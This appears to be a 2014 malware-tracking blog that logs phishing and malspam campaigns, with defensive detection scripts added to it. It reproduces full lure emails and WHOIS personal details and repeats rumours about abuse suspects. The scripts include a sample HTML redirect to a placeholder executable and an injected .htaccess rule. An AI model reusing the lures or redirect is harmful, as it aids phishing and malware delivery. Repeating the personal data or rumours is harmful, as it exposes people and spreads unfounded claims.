Thursday, 31 July 2014

"Scanned Image from a Xerox WorkCentre" spam

This is a thoroughly old school spam with a malicious attachment.

Date:      Thu, 31 Jul 2014 18:16:08 +0000 [14:16:08 EDT]
From:      Local Scan [scan.614@victimdomain]
Subject:      Scanned Image from a Xerox WorkCentre

You have a received a new image from Xerox WorkCentre.

Sent by: victimdomain
Number of Images: 5
Attachment File Type: ZIP [PDF]

WorkCentre Pro Location: Machine location not set
Device Name: victimdomain

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL:

Guess what.. it isn't an image at all, but a ZIP file with the unusual name of Image_[_var=partorderb].zip which contains a malicious executable Image_07312014.scr, scoring a measly 1/54 at VirusTotal.

The Comodo CAMAS report shows that the malware downloads components from the following locations:

There are some further clues in the VirusTotal comments as to what the malware does. Sophos has also seen the (OVH, France) IP before.

Recommended blocklist:

Evernote "File has been sent" spam

I've never understood Evernote. Something to do with elephants I think. But this spam isn't from them anyway..
Date:      Thu, 31 Jul 2014 12:26:53 +0200 [06:26:53 EDT]
From:      EVERNOTE []
Subject:      File has been sent [redacted]

DSC_9426679.jpg attached to the letter
Copyright 2014 Evernote Corporation. All rights reserved
The file attached is actually and not .jpg, containing a malicious executable DSC_8832966.exe with a VirusTotal detection rate of 7/53. The CAMAS report shows that the malware attempts to download an additional component from the following locations:

These download locations are the same as yesterday's Amazon spam run. The downloaded file has a VT detection rate of 3/53.

The recommended blocklist is the same as yesterday.

"New fax" spam using shortening service

Here are a couple of variations of a fax spam using the shortening service:

From:     Fax [fax@victimdomain]
Date:     31 July 2014 11:23
Subject:     You've received a new fax

New fax at SCAN5735232 from EPSON by https://victimdomain
Scan date: Thu, 31 Jul 2014 19:23:11 +0900
Number of pages: 2
Resolution: 400x400 DPI

You can download your fax message at:

(Google Disk Drive is a file hosting service operated by Google, Inc.)


From:     FAX []
Reply-to:     FAX []
Date:     31 July 2014 10:53
Subject:     You have received a new fax message

You have received fax from EPS76185555 at victimdomain
Scan date: Thu, 31 Jul 2014 16:53:10 +0700
Number of page(s): 2
Resolution: 400x400 DPI

Download file at google disk drive service - dropbox.

File is scanned image in PDF format.
Adobe(A) Reader(R) can be downloaded from the following URL:
There seems to be an uptick of spam.. if you receive something like this you can report it to as malware.

I've seen three different URLs:

These lead to the following download locations:

Obviously, this is a ZIP file. It contains a malicious executable Document-95722.scr which has a VirusTotal detection rate of just 1/54. The CAMAS report shows that the malware reaches out to the following locations to download further components:

Incidentally, if you add a "+" to the end of the URL you can see how many people have clicked through. For example:

164 clicks isn't a lot, but there are multiple URLs in use.

Recommended blocklist:

Wednesday, 30 July 2014

"Payslip" spam

Presumably terseness works with this kind of message:

From:     Richard Mason []
Date:     30 July 2014 21:23
Subject:     Payslip

Please find attached the payment slip.
Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

Clicking OK downloads an executable from which you are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..

..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link, because the attachment is Base64 encoded.

Content-Type: text/html; charset=US-ASCII; name="swift copy-Payment-Slip-$70,000.html"
Content-Disposition: attachment;
    filename="swift copy-Payment-Slip-$70,000.html"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_hy93oezq0
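To see what the Base64 transfer encoding hides from a link scanner, here is an added example (not code from the original post): it builds a constructed message with an HTML attachment encoded the way the headers above show, then compares a naive scan of the raw message text with a scan that decodes each attachment first. The attachment name is taken from the post; the sender, the HTML and the download URL are placeholders.

```python
"""Find links hidden inside base64-encoded HTML attachments.

Added example (not code from the original post). A scanner that only
greps the raw message for URLs misses a link that lives inside a
base64-encoded text/html attachment; decoding each attachment first
finds it. The sample message is constructed: the attachment name
mirrors the one in the post, but sender, HTML and link are placeholders.
"""
import re
from email import encoders, message_from_string
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# File types a defender would want flagged when an attachment links to them.
RISKY_SUFFIXES = (".exe", ".scr", ".zip", ".com", ".pif", ".bat", ".jar")

ATTACHMENT_NAME = "swift copy-Payment-Slip-$70,000.html"
# Constructed HTML mimicking the behaviour the post describes: a popup,
# then the browser is sent to a download. The host is a placeholder.
SAMPLE_HTML = (
    "<html><body><script>alert('Payment slip');"
    "window.location='http://download.example.invalid/payment.exe';"
    "</script></body></html>"
)


def build_sample_message() -> str:
    """Build a constructed multipart mail with the HTML attached as base64."""
    msg = MIMEMultipart()
    msg["From"] = "payroll@example.invalid"   # placeholder sender
    msg["Subject"] = "Payslip"
    msg.attach(MIMEText("Please find attached the payment slip.", "plain"))
    part = MIMEBase("text", "html", charset="US-ASCII", name=ATTACHMENT_NAME)
    part.set_payload(SAMPLE_HTML.encode("ascii"))
    encoders.encode_base64(part)          # adds Content-Transfer-Encoding: base64
    part.add_header("Content-Disposition", "attachment", filename=ATTACHMENT_NAME)
    msg.attach(part)
    return msg.as_string()


def links_in_raw_text(raw: str) -> list:
    """Naive scan: URLs visible in the undecoded message text."""
    return URL_RE.findall(raw)


def links_in_attachments(raw: str) -> dict:
    """Decode every attachment (honouring its transfer encoding) and
    return {filename: [urls found in the decoded content]}."""
    msg = message_from_string(raw)
    found = {}
    for part in msg.walk():
        if part.is_multipart() or part.get_content_disposition() != "attachment":
            continue
        body = part.get_payload(decode=True) or b""   # undoes the base64
        charset = part.get_content_charset() or "latin-1"
        text = body.decode(charset, "replace")
        found[part.get_filename() or "<unnamed>"] = URL_RE.findall(text)
    return found


def risky_links(urls) -> list:
    """URLs whose path ends in an executable or archive extension."""
    return [u for u in urls if u.lower().split("?", 1)[0].endswith(RISKY_SUFFIXES)]


if __name__ == "__main__":
    raw = build_sample_message()
    print("raw-text scan:", links_in_raw_text(raw))
    for name, urls in links_in_attachments(raw).items():
        print(name, "->", urls, "risky:", risky_links(urls))
```

The point is operational rather than clever: a filter that inspects only the textual parts of a message never sees the URL, while one that decodes each attachment according to its Content-Transfer-Encoding and then looks for links to executables (.exe, .scr, .zip and friends) catches this template.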

The malware itself has a VirusTotal detection rate of 31/53 which is frankly better than I'd expect. Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter:

"AMAZON.CO.UK - Your Amazon order" spam

Another fake Amazon spam with a malicious payload:
Date:      Wed, 30 Jul 2014 18:08:43 +0800 [06:08:43 EDT]
From:      "AMAZON.CO.UK" []
Subject:      Your Amazon order #853-9908013-4362599


Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on
Order Details

Order #853-9908013-4362599 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.

There's a ZIP file attached (in this case which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53. The Comodo CAMAS report shows that it downloads a further component from the following locations:

This second executable has a VT detection rate of 5/54. I recommend blocking the following sites:

"Order status -950533 30.07.2014.xls" spam

This body-text-less spam comes with a malicious attachment.

Date:      Wed, 30 Jul 2014 17:06:27 +0530 [07:36:27 EDT]
From:      Twila Garner []
Subject:      Order status -950533 30.07.2014.xls
Actually the body text isn't completely blank but does contain some bits of HTML.


    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <body text="#000000" bgcolor="#FFFFFF">

But the payload is the thing: in this case there is an archive called containing a folder order-8301138-30.07.2014.xls which in turn contains a malicious executable order-8301138-30.07.2014.xls.exe which has a VirusTotal detection rate of 6/54.

The Comodo CAMAS report shows attempted downloads from the following connections:

A second file is downloaded from these locations with a VT detection rate of just 2/54. The CAMAS report is inconclusive.

I recommend the following blocklist:

QuickBooks "Important - Payment Overdue" spam has a malicious PDF attachment

This fake QuickBooks Invoice spam comes with a malicious payload:

From:     QuickBooks Invoice []
Date:     29 July 2014 23:08
Subject:     Important - Payment Overdue

Please find attached your invoices for the past months. Remit the payment by 07/30/2014 as outlines under our "Payment Terms" agreement.

Thank you for your business,

Josephine Shirley

This e-mail has been sent from an automated system.  PLEASE DO NOT REPLY.

The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you.
The attached file (in this case invoice_7564675_07292014.pdf) contains an exploit with a VirusTotal detection rate of 7/53. I haven't had a chance to analyse the exploit myself yet.

Tuesday, 29 July 2014

Infographic: Operation Yewtree vs Operation Fernbridge arrests

Two broadly equivalent investigations into child abuse rings, Operation Yewtree and Operation Fernbridge have had very different outcomes.

Yewtree has seen arrests of several high-profile people involved in the media, the majority of whom have not been found guilty of anything. But the rumoured suspects in Fernbridge include politicians, civil servants, judges and leaders of industry as well as a pop star or two. Why are the current outcomes looking so different?

(click graphic to enlarge)

Something evil on,, and (

I don't know quite what the exploit kit of the month is here, but the IP addresses,, and are currently serving up malware using hijacked GoDaddy domains, and are targeting victim websites by altering their .htaccess files to intercept traffic coming from search engines such as Google.

These IP addresses have been used for malware for some time, and certainly historically they have been used for Ponmocup. I can't confirm that this is still the case, but given the bad IPs and the obvious .htaccess hijack, it passes the Duck Test.
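As an added example (not from the original post), the following checks a site's .htaccess for the redirect shape described above: a RewriteCond on HTTP_REFERER that names a search engine, immediately followed by a RewriteRule whose target is an external URL. The sample .htaccess and the redirect host are constructed placeholders; own_hosts lists hostnames the site legitimately redirects to.

```python
"""Spot .htaccess rewrite rules that divert search-engine visitors off-site.

Added example (not code from the original post). It parses an .htaccess
file and reports any RewriteRule whose target is an external URL and
whose preceding RewriteCond tests HTTP_REFERER for a search engine, the
conditional-redirect shape the post describes. The sample .htaccess and
the destination host are constructed placeholders.
"""
import re

SEARCH_ENGINE_RE = re.compile(r"google|bing|yahoo|msn|yandex|ask\.com|aol", re.IGNORECASE)
EXTERNAL_TARGET_RE = re.compile(r"^https?://([^/\s]+)", re.IGNORECASE)

# Constructed sample: legitimate rules plus one injected referer-conditional redirect.
SAMPLE_HTACCESS = r"""# legitimate rules
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
# injected block (constructed sample)
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|msn)\. [NC]
RewriteRule ^(.*)$ http://redirect.example.invalid/landing [R=302,L]
# legitimate referer check and same-site redirect
RewriteCond %{HTTP_REFERER} ^https://www\.example\.com/ [NC]
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
"""


def find_referer_hijacks(htaccess_text: str, own_hosts=()) -> list:
    """Return one finding per RewriteRule that (a) redirects to a host not in
    own_hosts and (b) is guarded by a RewriteCond on HTTP_REFERER naming a
    search engine. A RewriteCond applies to the next RewriteRule only, as in
    Apache, so the pending conditions are cleared after each rule."""
    own = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # (line_no, RewriteCond text) seen since the last RewriteRule
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        text = line.strip()
        if not text or text.startswith("#"):
            continue
        directive = text.split(None, 1)[0].lower()
        if directive == "rewritecond":
            pending.append((line_no, text))
            continue
        if directive != "rewriterule":
            continue
        fields = text.split()
        target = fields[2] if len(fields) >= 3 else ""
        m = EXTERNAL_TARGET_RE.match(target)
        external = bool(m) and m.group(1).lower() not in own
        referer_conds = [
            (n, c) for n, c in pending
            if "HTTP_REFERER" in c.upper() and SEARCH_ENGINE_RE.search(c)
        ]
        if external and referer_conds:
            findings.append({
                "rule_line": line_no,
                "target": target,
                "condition_lines": [n for n, _ in referer_conds],
            })
        pending = []
    return findings


if __name__ == "__main__":
    for f in find_referer_hijacks(SAMPLE_HTACCESS):
        print(f"line {f['rule_line']}: redirect to {f['target']} "
              f"guarded by RewriteCond on lines {f['condition_lines']}")
```

Because the rewrite only fires for visitors arriving from a search engine, a site owner who types the address directly never sees it, which is why this sort of hijack goes unnoticed; running a check like this over web roots, or diffing each .htaccess against a known-good copy, is the practical detection.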

These IPs are allocated to Radore Veri Merkezi Hizmetleri A.S. in Turkey who control which is a large block, so these IPs are probably a customer or even a customer of a customer.

VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of a single allocation, which I would very strongly recommend blocking; indeed the entire /24 looks pretty worth

These domains all use the GoDaddy nameservers, which naturally means most of them are GoDaddy domains.. but not all of them, some are from other registrars. This list [pastebin] includes a selection of active subdomains that I can find.

I recommend permablocking the following IP range and temporarily blocking the following domains:

Note that the following domains have been cleaned up and are probably now safe.

Monday, 28 July 2014

"Your Amazon order" spam

This fake Amazon spam comes with a malicious attachment:

Date:      Mon, 28 Jul 2014 13:15:57 +0200 [07:15:57 EDT]
From:      "AMAZON.CO.UK" []
Subject:      Your Amazon order #239-1744919-1697181


Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on
Order Details

Order #239-1744919-1697181 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.

Attached is a file which in turn contains a malicious executable Order details 001-8821901-992107.exe which has a VirusTotal detection rate of 18/54.

The Comodo CAMAS analysis shows that the malware reaches out to a familiar set of URLs to download further components:

I would recommend blocking the following domains:

Something evil on (Ransomware)

(Hetzner, Germany) is infected with a whole bunch of ransomware landing pages, like this:

In the past this IP range has been used to host a number of legitimate Austrian sites, but at the moment it appears to be hosting ransomware landing pages exclusively.

The domains in use are a combination of crappy .in domains registered to a series of fake addresses, plus a bunch of subdomains of legitimate domains that have been hijacked. What is interesting about these hijacked domains is that they all use as nameservers.

This hijacking at is because these particular domain users are using the free service which allows anyone to create a subdomain of your domain and point it where they like (explained in this FAQ). The bad news is that this sort of hijacking is a quick way to ruin your domain's reputation. A full list of the subdomains and domains I can find is here [pastebin].

Although this is a Hetzner IP, it is suballocated to a customer who may or may not know anything about this abuse of the IPs in the range:

inetnum: -
netname:        ANDY-CONTE
descr:          Andy Conte
country:        DE
admin-c:        DS15036-RIPE
tech-c:         DS15036-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
source:         RIPE # Filtered

person:         Dmitry Seleznev
address:        Ivana Franko 38-364
address:        121351 Moscow
address:        RUSSIAN FEDERATION
phone:          +79270473970
nic-hdl:        DS15036-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

Blocking these landing pages will probably not stop a PC from becoming infected with ransomware, but monitoring or blocking the following list may give you some intelligence as to what is happening on your own network.
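As an added example (not code from the original post) of the monitoring suggested above, this matches proxy log lines against a blocklist made of CIDR ranges and domains. The ranges, domains and log lines are constructed placeholders (documentation prefixes and .invalid names), not the values from the post, and the four-field log line format is an assumption made for the example.

```python
"""Check proxy log lines against a blocklist of CIDR ranges and domains.

Added example, not from the original post. Blocklist entries and log
lines are constructed placeholders; the log format (timestamp, client
IP, destination IP, URL) is assumed for the example.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed blocklist: a /24 and a smaller range, plus two domains.
# A domain entry also covers every subdomain beneath it.
BLOCKED_RANGES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("198.51.100.64/26"),
]
BLOCKED_DOMAINS = {"bad-landing.invalid", "hijacked.example"}

# Constructed log lines: timestamp client-ip dest-ip url
SAMPLE_LOG = """\
1406577600.123 10.0.0.5 203.0.113.77 http://203.0.113.77/landing/
1406577601.456 10.0.0.9 192.0.2.10 http://www.example.org/index.html
1406577602.789 10.0.0.5 198.51.100.200 http://promo.bad-landing.invalid/go
1406577603.000 10.0.0.7 198.51.100.70 http://legit.example/page
"""
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<dest>\S+)\s+(?P<url>\S+)$")


def domain_blocked(host: str) -> bool:
    """True if host equals a blocked domain or sits anywhere beneath one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def ip_blocked(ip_text: str) -> bool:
    """True if the address falls inside any blocked range; non-IPs never match."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in BLOCKED_RANGES)


def match_log(log_text: str) -> list:
    """Return (client, url, reasons) for every line that touches the blocklist.
    The destination IP is checked directly so that connections made straight
    to an address, with no hostname in the URL, are still caught."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue   # malformed line; a real tool would count these
        host = urlsplit(m["url"]).hostname or ""
        reasons = []
        if ip_blocked(m["dest"]):
            reasons.append(f"dest {m['dest']} in blocked range")
        if domain_blocked(host):
            reasons.append(f"host {host} on domain blocklist")
        if reasons:
            hits.append((m["client"], m["url"], reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in match_log(SAMPLE_LOG):
        print(client, url, "; ".join(reasons))
```

Domain entries match the host and every subdomain beneath it, which matters for the hijacked subdomains mentioned above, and the range check is done on the destination address rather than the URL host so that a client talking straight to an IP still shows up.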

Recommended blocklist:

Saturday, 26 July 2014

"PLEASE SEND PI" spam / something evil on

"PI" in this case seems to refer to a Proforma Invoice rather than Π - but in fact the attachment is malware.

Date:      Fri, 25 Jul 2014 22:50:14 -0700 [01:50:14 EDT]
Subject:      PLEASE SEND PI


Regarding our previous conversation about our urgent purchase, kindly
find attached PI and let us know if the quantity can fit in 40ft
kindly revise the Proforma invoice so that we can proceed with an
advance payment as agreed.

We look forward to your urgent response with revised proforma invoice.

Thks & Rgds,
Tel : 0097143205171
Fax : 0097143377150 
It sounds like a fiendish maths question from an obscure exam. How much Π can you fit in a 40ft container? Anyway, the attachment contains a malicious executable klopppp890.exe which has a VirusTotal detection rate of 18/53. The ThreatExpert report [pdf] and ThreatTrack report [pdf] show that the malware phones home to on (OVH Canada reassigned to Big Kesh, LLC, US).

Looking at the domains registered on and the surrounding IPs there do seem to be a lot of malicious ones being used as malware C&Cs: [1] [2] [3] [4] [5] [6] [7] [9] [10] [11] [12]

I think this is enough evidence to block the entire as a precaution (although there do appear to be a small number of legitimate sites too). For the record, this is suballocated to:

NetRange: -
OriginAS:       AS16276
NetName:        OVH-CUST-445017
NetHandle:      NET-198-27-110-192-1
Parent:         NET-198-27-64-0-1
NetType:        Reassigned
RegDate:        2014-03-07
Updated:        2014-03-07

CustName:       Big Kesh, LLC
Address:        1077 Jearsey ln ne
City:           Palm Bay
StateProv:      FL
PostalCode:     32905
Country:        US
RegDate:        2014-03-07
Updated:        2014-03-07

In the case of Big Kesh LLC I will be charitable and assume that this behaviour is happening without their consent.

The domains and appear to be used for purely malicious purposes, so I recommend that you block them. The registrant details are probably fake but here they are:
Registrant ID:                               06BFAFB5641FA567
Registrant Name:                             Xieng Hyua
Registrant Address1:                         Red Bulevard
Registrant City:                             North Bergen
Registrant State/Province:                   NJ
Registrant Postal Code:                      07047
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.6874598745
Registrant Email:                  
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11

Registrant ID:                               0121C76442E2ED55
Registrant Name:                             Jackson Togan
Registrant Address1:                         Zhongzeng District 100
Registrant City:                             Zhongzeng District
Registrant State/Province:                   Zhongzeng District
Registrant Postal Code:                      100
Registrant Country:                          TAIWAN, PROVINCE OF CHINA
Registrant Country Code:                     TW
Registrant Phone Number:                     +92.68974568
Registrant Email:                  
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11

Recommended blocklist:

Friday, 25 July 2014

"eFax message" spam

Another tired old spam template leading to malware..

From:     eFax Corporate []
Date:     25 July 2014 14:25
Subject:     eFax message - 4 pages

Fax Message [Caller-ID: 948-468-7596]

You have received a 4 pages fax at 2014-07-25 13:24:21 GMT.

* The reference number for this fax is latf1_did11-1187609582-1911573644-58.

View this fax using your PDF reader.

Click here to view this message

Please visit if you have any questions regarding this message or your service.

Thank you for using the eFax service!
Home | Contact | Login |
Powered by j2

2014 j2 Global Communications, Inc. All rights reserved.
eFax is a registered trademark of j2 Global Communications, Inc.

This account is subject to the terms listed in the eFax Customer Agreement.

In this case the link in the email goes to which downloads a file with a VirusTotal detection rate of just 1/45. Automated analysis [pdf] is fairly inconclusive as to what it does.

Tiffany & Co "invoice 0625859 July" spam

This fake Tiffany & Co email has a malicious attachment:

Date:      Fri, 25 Jul 2014 17:32:38 +0800 [05:32:38 EDT]
From:      "J.Parker" []
Subject:      invoice 0625859 July

Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.

Tiffany & Co.
Attached to the message is an archive invoice which contains a folder invoice copy in which there is a malicious file invoice copy.exe which has a VirusTotal detection rate of 9/51. The CAMAS report shows that the malware downloads components from the following locations:

Those sites are similar to the one found in the recent "Birmingham Mail" spam run. I recommend that you block the following domains on your network:

"Help & Advice - Virgin Media Business" / Virginmedia Business spam

A bit of a malspam tsunami today: this fake email claims to be from Virgin Media Business.

Date:      Fri, 25 Jul 2014 19:57:24 +0700 [08:57:24 EDT]
From:      Virginmedia Business []
Reply-To:      Legal Aid Agency []

Virgin Media Automated Billing Reminder

Date 25th July 2014

This e-mail has been sent you by Virgin Media to inform you that we were
unable to process your most recent payment of bill. This might be due to
one of the following reasons:

    A recent change in your personal information such as Name or address.
    Your Credit or Debit card has expired.
    Insufficient funds in your account.
    Cancellation of Direct Debit agreement.
    Your Card issuer did not authorize this transaction.

To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.

Please fulfill attached form and send it back to our email adress.

Please ensure all address and contact details are up to date, once submitted your account details will automatically be updated within 24 Hours.

Kind Regards,

Virgin Media

Customer Services Team

Ellis Willis

Attached is an archive file which in turn contains a folder billing_form91_4352-2105.pdf which in turn contains a malicious executable billing_form91_4352-2105.pdf.scr which has a VirusTotal detection rate of 3/53. The Comodo CAMAS report indicates that it is largely the same in behaviour as this HMRC malware from earlier today.

HM Revenue and Customs "Notice of Underreported Income" spam

The second HMRC spam run of the day; this one contains a malicious link.
From:     HM Revenue and Customs []
Reply-To:     HM Revenue and Customs []
Date:     25 July 2014 12:19
Subject:     Notice of Underreported Income

Taxpayer ID: ufwsd-000007954108UK
Tax Type: Income Tax
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax income statement on HM Revenue and Customs ( HMRC ).Download your HMRC statement.
Please complete the form. You can download HMRC Form here.
In this case the link in the email goes to which the user is expected to download and run. It has a VirusTotal detection rate of 3/51. Automated analysis tools are pretty inconclusive [1] [2] [3] but do reveal some of the behavioural activity.

HMRC "Tax Notice July 2014" spam

This fake HMRC tax notice comes with a malicious attachment:

Date:      Fri, 25 Jul 2014 16:48:37 +0900 [03:48:37 EDT]
From:      HMRC Revenue&Customs []
Reply-To:      Legal Aid Agency []

Dear [redacted] ,

Please be advised that one or more Tax Notices (P6, P6B) have been issued.

For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 34320-289.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
2014 © All rights reserved

Attached is a file which unzips to a folder called P6_rep(9432)_84632_732.doc which contains a malicious executable P6_rep(9432)_84632_732.doc.scr which has a VirusTotal detection rate of 4/53.

The CAMAS report shows that a second component is downloaded from which in turn has a VirusTotal detection rate of 5/52.

The IP address of is in the same /24 as the two other IPs mentioned here. I would very strongly recommend blocking traffic to at least or the whole range (although there do seem to be some legitimate Russian-language sites in there). The IP belongs to:

inetnum: -
netname:        COMFORTEL-NET
descr:          COMFORTEL ltd.
country:        RU
admin-c:        ME3174-RIPE
tech-c:         RASS-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-routes:     MNT-PIN
mnt-domains:    PIRIX-MNT
source:         RIPE # Filtered

person:         Mikhail Evdokimov
address:        PIRIX
address:        Obukhovskoy Oborony, 120-Z
address:        192012, St.Petersburg
address:        Russia
phone:          +7 812 3343610
fax-no:         +7 812 6002014
nic-hdl:        ME3174-RIPE
mnt-by:         RUNNET-MNT
source:         RIPE # Filtered

person:         Dmitry Rassohin
address:        194156, St.Petersburg, Russia
address:        Bolshoy Sampsonievskiy prospekt 106A, apt. 304
phone:          +7 931 2700021
nic-hdl:        RASS-RIPE
mnt-by:         RASS-MNT
source:         RIPE # Filtered

descr:          PIRIXROUTE
origin:         AS56534
mnt-by:         MNT-PIN
source:         RIPE # Filtered

abused by spammers

I noticed a whole load of queries in URLquery about (such as this one) which I thought to be kind of odd..

"Adminsecret" sounds really interesting from a security perspective, but really it's a site aimed at executive assistants and people with similar roles.

The pages being queried are "articles" that look like this:

This doesn't look very much like a tip on how to be a better admin. There also appears to be a webspam campaign active to drive traffic to these sites:

So a mix of payday loans and movie downloads. So let's go back to this "Blended Movie Online" page with the prominent "Watch Now" button. This actually takes you to a site that tantalisingly waves another "download" button at you.

Clicking "Download Now" leads you into a cesspit of adware. Instead of getting a movie, you are directed to download a file Blended.exe from Of course, this isn't a movie file at all, but some piece of crappy adware with a VirusTotal detection rate of 17/51 (mostly detected as InstallRex).

Various analysis tools [1] [2] [3] piece together what this adware does, but from a network point of view it makes a connection to the following domains:

This last one is the clue as to who is making this adware, registered to:

descr: LTD
descr:        Harbel 10
descr:        Oranit Israel
descr:        4481300
descr:        Israel
phone:        +972 72 2124145
fax-no:       +972 72 2124145
e-mail:       admin AT

allows you to make your own browser extensions. Hmm. Looks like a good candidate to block if you don't want unauthorised BHOs and the like.

So, for this particular issue I would recommend the following blocklist:

Back to the site, if you want to watch the movie online instead of downloading it you get redirected to which is some sort of movie subscription service based in the British Virgin Islands. Frankly you'd be better off with Netflix, Amazon, Google or some other reputable service.

Oh yes.. and there's payday loan crap too:

So right now I would say that is horribly compromised and is probably a good candidate for blocking until they get the issues sorted out.

UPDATE: emails to info -at- bounce, so far I have not been able to contact them.

Thursday, 24 July 2014

Scam: "" is not The Brunner Investment Trust PLC

This simple spam is backed up by a fairly sophisticated fake website.

From:     brunner investment []
To:     50
Date:     24 July 2014 12:08


The Brunner Trust PLC, is working on expanding its international portfolio Globally and financing projects in form of debt financing from the tune of $1million to $500million,
we also offer personal and business loans from the tune of $100,000 USD to $1,000,000.00 USD

We would be happy to receive an Executive summary to see if you have any Viable project we can finance and partner together
by making financial investment in Form of soft loans.

Email your projects summary to us at:

Stefan Hofrichter
Chief Economist and Head of Global Economics & Strategy
The Brunner Investment Trust PLC is a real organisation with a website at - the domain that the spammers are soliciting replies to is (note the missing "n" in "brunner"). It was registered on 31st May 2014 with anonymous WHOIS details.

This is the real Brunner Investment Trust site:

And this is the fake one:

The differences are subtle:

Of course the main purpose of the web site is to encourage you to think that you are talking to a real person, to which end the contact details are completely fake:

Although the postal address is correct, the rest of the details are fake:

Brunner Investment Trust Plc
199 Bishopsgate,
London, EC2M 3TY
Tel:+44 703 195 6304
Tel/Fax: +44 745 227 1933
The telephone numbers quoted appear to be "follow me anywhere" numbers that forward to another number, which could be anywhere in the world.

So what's the scam? Well, there's probably an up-front fee to even discuss financing.. and if it's like this recent scam it could be tens of thousands of dollars. Of course, there is no financing available (remember that this is a fake site, not the Brunner Investment Trust) and once the scammers have your money they will vanish.

I note as well that the site is fairly well done although somewhat buggy (and it randomly pops up adverts) which looks rather like the same cloned websites I discussed earlier this month.

Some technical details for this - the site is hosted on which is allocated to Hostinger International in Lithuania (although the servers might be in Amsterdam). The spam originates from (Botswana Telecommunications Corporation) via an unknown mail relay on (Telecom Italia, Verona, Italy).


"You have received a new VoiceMail" spam

This tired old malware spam is doing the rounds again.

From:      Voice Mail [voicemail_sender@local]
Subject:      You have received a new VoiceMail
Date:      Thu, 24 Jul 2014 17:31:25 +0700 [06:31:25 EDT]

You have received a voice mail message.
Message length is 00:03:27. 
As you might expect, the attachment does not contain a voice mail at all, but it is a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 3/53.

The CAMAS report and Anubis report show the malware downloading an encrypted file from the following locations:

Blocking those sites may give some protection against this malware.

NatWest "You have received a secure message" spam

This spam contains a link going to a malicious file:

From:     NatWest []
Date:     24 July 2014 14:06
Subject:     You have received a new secure message

You have received a secure message

To read your secure message click here . You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.

If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 2568.
First time users - will need to register after opening the attachment.

About Email Encryption -
Another version uses the telephone number 0131 556 2164.

There are probably several different versions; in the ones I have, the download location is:

This malware has a VirusTotal detection rate of 6/52. Automated analysis tools are inconclusive [1] [2] as to what it does.